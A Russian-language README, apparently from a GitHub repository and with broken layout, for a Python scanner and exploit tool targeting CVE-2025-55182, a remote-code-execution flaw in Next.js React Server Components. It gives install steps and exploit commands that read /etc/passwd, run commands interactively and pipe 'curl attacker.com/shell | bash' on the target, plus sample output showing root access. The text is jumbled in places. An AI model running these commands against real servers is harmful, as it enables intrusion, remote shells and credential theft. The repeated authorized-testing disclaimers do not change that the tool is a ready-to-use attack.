
Безопасный сканер на Python для обнаружения и эксплуатации уязвимостей **React Server Components (RSC)** в приложениях Next.js. Этот инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование на эксплуатацию RCE.
Безопасностный сканер на Python для обнаружения и эксплуатации уязвимостей React Server Components (RSC) в приложениях Next.js. Инструмент выполняет пассивное обнаружение, активное снятие отпечатков и тестирование эксплуатации RCE.
⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте письменное разрешение перед тестированием.
✅ Пассивное обнаружение — анализирует HTML, заголовки и структуру страницы на наличие индикаторов RSC
✅ Активное снятие отпечатков — отправляет RSC-специфичные заголовки для обнаружения ответов сервера
✅ Анализ HTTP-заголовков — выявляет заголовки, связанные с Next.js и RSC
✅ Эксплуатация RCE — выполняет команды на уязвимых серверах (если эксплойт возможен)
✅ Цветной вывод в терминал — улучшенная визуальная обратная связь для лучшей читаемости
✅ Интерактивный режим — выполнение нескольких команд в режиме эксплуатации
✅ Надёжное декодирование — обработка gzip-сжатых и бинарных полезных нагрузок
Клонируйте репозиторий
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Установите зависимости
pip install -r requirements.txt
Требуемые пакеты:
requests>=2.28.0 — библиотека HTTP-клиентаurllib3>=1.26.0 — расширенные утилиты HTTPcolorama>=0.4.6 — цвета терминала (совместимо с Windows)beautifulsoup4 — парсинг HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Затем вводите команды в приглашении (введите quit для выхода).
| Опция | Описание |
|---|---|
<URL> | URL цели (обязательно). Автоматически добавляется https://, если отсутствует |
--exploit |
Обнаружение уязвимости RSC:
python rsc_detector.py https://target.com
Эксплуатация и выполнение команды id:
python rsc_detector.py https://target.com --exploit --cmd "id"
Эксплуатация и выполнение cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Интерактивный режим (несколько команд):
python rsc_detector.py https://target.com --exploit
window.__next_f (маршрутизатор приложений Next.js)text/x-component__NEXT_DATA__ и импортов Next.jsServer, Vary и X-Nextjs-CacheRSC: 1[*] Запуск сканирования RSC Detection на: https://example.com
====================================================================
[1] Выполнение пассивного сканирования...
Статус: ОБНАРУЖЕНО
Оценка: 80/100
- Найдено: window.__next_f (App Router)
[2] Анализ заголовков...
- Заголовок Vary включает RSC: ...
[3] Выполнение активного снятия отпечатков...
Статус: ОБНАРУЖЕНО
- Content-Type ответа стал text/x-component
- Заголовок Vary содержит 'RSC'
====================================================================
[ИТОГОВЫЙ РЕЗУЛЬТАТ] УЯЗВИМО
[!] Это приложение, по-видимому, уязвимо для атак на основе RSC!
Рекомендуется: возможна эксплуатация RCE
[*] Выполнение команды: whoami
[+] Команда выполнена успешно!
[ВЫВОД]
root
CVE-2025-55182 использует:
child_process.execSync()Этот инструмент СТРОГО ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ:
Несанкционированный доступ к компьютеру незаконен согласно:
Если вы обнаружите уязвимость с помощью этого инструмента:
Инструмент по умолчанию игнорирует проверку SSL. Чтобы включить проверку:
detector = RSCDetector(url, verify_ssl=True)
Инструмент автоматически:
Увеличьте тайм-аут в коде:
response = self.session.get(self.url, timeout=30) # 30 секунд
CVE-2025-55182/
├── README.md # Этот файл
├── requirements.txt # Зависимости Python
├── rsc_detector.py # Основной сканер и движок эксплойта
├── rsc_cli.py # Утилиты CLI (если есть)
├── script.py # Дополнительные скрипты (если есть)
├── COLOR_GUIDE.md # Документация цветного вывода
└── .gitignore # Правила игнорирования Git
requests>=2.28.0 # HTTP-запросы
urllib3>=1.26.0 # Расширенный HTTP
beautifulsoup4>=4.11.0 # Парсинг HTML
colorama>=0.4.6 # Цвета терминала (Windows)
Установить всё сразу:
pip install -r requirements.txt
--exploit, если нужно только сканированиеpython rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
python rsc_detector.py https://target.com > scan_results.txt 2>&1
for url in https://site1.com https://site2.com; do
python rsc_detector.py "$url"
done
Нашли ошибку или есть предложение по улучшению? Вклад приветствуется!
git checkout -b feature/improvement)git commit -am 'Add feature')git push origin feature/improvement)THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
Этот проект предоставляется только для образовательных и авторизованных целей тестирования безопасности.
Создано для исследований в области безопасности и авторизованного тестирования на проникновение.
Последнее обновление: 19 декабря 2025 г.
Помните: С большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.
| Включить эксплуатацию RCE после обнаружения |
--cmd <команда> | Выполнить определённую команду (используйте с --exploit) |